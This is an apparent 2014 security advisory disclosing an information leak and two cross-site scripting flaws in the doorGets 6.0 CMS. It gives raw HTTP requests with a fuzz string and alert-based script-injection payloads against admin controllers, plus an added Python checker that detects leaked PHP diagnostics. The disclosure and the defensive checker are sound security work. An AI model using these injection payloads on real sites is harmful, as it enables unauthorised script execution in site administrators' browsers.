Friday, 28 February 2014

[EN] Multiple vulnerabilities in doorGets 6.0

# ==============================================================
# Title ...| Multiple vulnerabilities in doorGets 6.0
# Version .| doorGets 6.0
# Date ....| 27.02.2014
# Found ...| HauntIT Blog
# Home ....| http://sourceforge.net
# ==============================================================


# ==============================================================
# 1. Information disclosure bug

---<request>---
GET /k/cms/door/dg-admin/?controller=modulevideo&uri='`"%3b--#%%2f%2a HTTP/1.1
Host: 10.149.14.62(...)
Connection: close
---<request>---


---<response>---
Notice: Undefined variable: cResultsInt in /home/k/public_html/cms/door/cache/template/modules/bigadmin/modulevideo/bigadmin_modulevideo_index.tpl.php on line 90

Notice: Undefined variable: cResultsInt in /home/k/public_html/cms/door/cache/template/modules/bigadmin/modulevideo/bigadmin_modulevideo_index.tpl.php on line 90
video By Notice: Undefined variable: per in /home/k/public_html/cms/door/cache/template/modules/bigadmin/modulevideo/bigadmin_modulevideo_index.tpl.php on line 95
>10 Notice: Undefined variable: per in /home/k/public_html/cms/door/cache/template/modules/bigadmin/modulevideo/bigadmin_modulevideo_index.tpl.php on line 96
>20 Notice: Undefined variable: per in /home/k/public_html/cms/door/cache/template/modules/bigadmin/modulevideo/bigadmin_modulevideo_index.tpl.php on line 97
>50 Notice: Undefined variable: per in /home/k/public_html/cms/door/cache/template/modules/bigadmin/modulevideo/bigadmin_modulevideo_index.tpl.php on line 98
>100

Notice: Undefined variable: urlPageGo in /home/k/public_html/cms/door/cache/template/modules/bigadmin/modulevideo/bigadmin_modulevideo_index.tpl.php on line 103
---<response>---
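
A defender-side check for the disclosure in section 1, added here as an example and not part of the original advisory: it parses a response body for PHP diagnostics and reports which server paths, variable names and line numbers leak. The function names are hypothetical, the sample body is an excerpt of the response above, and Unix-style paths ending in .php are assumed.

```python
import re
from collections import Counter

# PHP's displayed error format: "<Level>: <message> in <file> on line <n>"
# Assumption: Unix-style absolute paths ending in .php.
PHP_DIAG = re.compile(
    r"(?P<level>Notice|Warning|Deprecated|Fatal error|Parse error|Strict Standards)"
    r": +(?P<message>.+?) in (?P<file>/\S+?\.php) on line (?P<line>\d+)"
)

# Constructed sample: excerpt of the response body shown in section 1.
SAMPLE_BODY = """\
Notice: Undefined variable: cResultsInt in /home/k/public_html/cms/door/cache/template/modules/bigadmin/modulevideo/bigadmin_modulevideo_index.tpl.php on line 90
video By Notice: Undefined variable: per in /home/k/public_html/cms/door/cache/template/modules/bigadmin/modulevideo/bigadmin_modulevideo_index.tpl.php on line 95
>10 Notice: Undefined variable: per in /home/k/public_html/cms/door/cache/template/modules/bigadmin/modulevideo/bigadmin_modulevideo_index.tpl.php on line 96
>100
Notice: Undefined variable: urlPageGo in /home/k/public_html/cms/door/cache/template/modules/bigadmin/modulevideo/bigadmin_modulevideo_index.tpl.php on line 103
"""

def find_php_diagnostics(body):
    """Return one dict per PHP diagnostic found anywhere in the response body."""
    # With html_errors=On PHP wraps level, file and line in <b> tags; drop tags first.
    body = re.sub(r"<[^>]+>", "", body)
    return [
        {"level": m["level"], "message": m["message"],
         "file": m["file"], "line": int(m["line"])}
        for m in PHP_DIAG.finditer(body)
    ]

def summarize(body):
    """Summarise what the body discloses: file paths, variable names, line numbers."""
    diags = find_php_diagnostics(body)
    variables = Counter(
        d["message"].split(": ", 1)[1] for d in diags
        if d["message"].startswith("Undefined variable: ")
    )
    return {
        "count": len(diags),
        "files": sorted({d["file"] for d in diags}),
        "variables": dict(variables),
        "lines": sorted({d["line"] for d in diags}),
    }

if __name__ == "__main__":
    print(summarize(SAMPLE_BODY))
```

A non-empty result on a production host means PHP is still rendering errors to the client; display_errors=Off with log_errors=On in php.ini keeps the diagnostics in the server log instead.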

# ==============================================================
# 2. Persistent XSS

---<request>---
POST /k/cms/door/dg-admin/?controller=modulepage&uri=asdasd&lg=en HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 294

modulepage_edit_titre=asdasd&modulepage_edit_article_tinymce=</textarea><body onload=alert(123)>&modulepage_edit_meta_titre=asdasd&modulepage_edit_meta_description=asdasd&modulepage_edit_meta_keys=&modulepage_edit_partage=1&modulepage_edit_submit=Save
---<request>---

# ==============================================================
# 3. XSS

---<request>---
POST /k/cms/door/dg-admin/?controller=configuration&action=siteweb HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 475

configuration_siteweb_statut=1&configuration_siteweb_statut_ip='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&configuration_siteweb_statut_tinymce=&configuration_siteweb_title=startowa&configuration_siteweb_slogan=startowa&configuration_siteweb_description=startowa&configuration_siteweb_copyright=startowa&configuration_siteweb_year=2014&configuration_siteweb_keywords=startowa&configuration_siteweb_id_facebook=&configuration_siteweb_id_disqus=&configuration_siteweb_submit=Save
---<request>---


# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/
